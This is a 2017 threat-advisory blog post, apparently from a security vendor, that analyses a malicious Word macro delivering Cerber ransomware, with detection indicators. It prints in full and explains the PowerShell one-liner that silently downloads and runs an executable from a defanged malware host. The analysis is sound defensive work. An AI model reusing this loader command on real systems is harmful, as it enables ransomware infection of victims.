Rajas Save

Malspam Delivers Cerber Ransomware July-2017

Blog Post created by Rajas Save Employee on Jul 21, 2017

During the early weeks of July, malspam activity delivered a malicious word document, which uses macros to download and execute a Cerber ransomware payload. This is not a new exploitation vector. Macros are often abused to perform malicious tasks, like downloading and dropping malware. Victims can easily be tricked into running the malicious macro.

 

 

Submitting the delivery document to What's This File service shows more information about the malicious word document.

 

 

This activity and more is also captured in the process tree below shows the series of events that led to downloading and executing a Cerber payload:

 

 

The macro in our MS Word Document calls PowerShell to connect to the malware’s distribution website to download and run an executable:

 

powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://dastonond[.]top/admin.php?f=1.jpg'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}

 

Line-By-Line analysis of PowerShell Command:

powershell.exe

  • First line of the command opens the PowerShell application from the Windows System32 directory

-WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;

  • Opens PowerShell as a hidden window so it is not visible to the victim.
  • The variable “$wscript” is created and assigned to the created WScript.Shell instance. 
  • WScript.Shell provides access to the OS shell methods,which substantially increase the capabilities and the types of applications that PowerShell can interact with.

$webclient = new-object System.Net.WebClient;

  • The variable $webclient is created and is given a System.Net.WebClient instance. 
  • The WebClient class provides a list of methods that allow the instantiated object to send and receive data from web servers identified by a URL.

$random = new-object random;

  • This command simply creates a new instance of a random object ($random).

$urls = ‘http://dastonond[.]top/admin.php?f=1.jpg'.Split(',')

  • The $urls variable is assigned to a malicious binary hosted on a malicious domain. 
  • This variable is also capable of stringing together multiple binaries hosted on different domains by simply separating the different URLs with commas. 

$name = $random.next(1, 65536);

  • The $name variable is assigned a random number from the $random variable between 1 and 65536.

$path = $env:temp + ‘\’ + $name + ‘.exe’;

  • The $path variable is set to the Windows environment variable directory which points to the user’s AppData temp folder. 

foreach($url in $urls){try{

  • The script iterates through each URL given in the $urls variable and runs the subsequent commands on it.

$webclient.DownloadFile($url.ToString(), $path);

  • The $webclient variable is used to download a file from the website in the $urls variable to the path specified in the $path variable. 

Start-Process $path;}break;}

  • Executing downloaded fine and if the command failed to return a process and continued silently, the window remains hidden and the process breaks.

catch{write-host $_.Exception.Message;}

  • This is another mechanism to keep the script running silently in the background.

 

In our case, it downloads a JPG file. Well, it is actually a PE file saved to C:\Users\<user>\AppData\Local\Temp\5356.exe". It runs and starts to spawn a number of processes to gather information and to encrypt files on the infected system.   

 

 

VirusTotal analysis of the dropped file confirm it’s Cerber Ransomware:

 

 

Once the ransomware has successfully installed, post-infection traffic shows typical Cerber beaconing UDP spray out to 77.12.57/24 on port number 6893.

 

 

Current NetWitness detection flags both payment domain (key.dga.tld pattern) as 'cerber ransomware' and the UDP spray as 'cerber beacon' in the <Indicators of Compromise> meta field. 

 

 

Additionally, <File Analysis> flags for 'js eval no docwrite' and 'exe filetype but not exe extension' should be noted as indicators of possibly malicious files.

 

 

All the IOCs are added to the following feeds on Live:

  • RSA FirstWatch Command and Control Domains
  • RSA FirstWatch Command and Control IPs

For more information on Cerber ransomware, its evolution and detection techniques using RSA NetWitness, Please check the following RSA Link articles:

 

 

Thanks go to Ahmed Sonbol and Kevin Stear for contributing to this threat advisory.

 

 

References:

 

Outcomes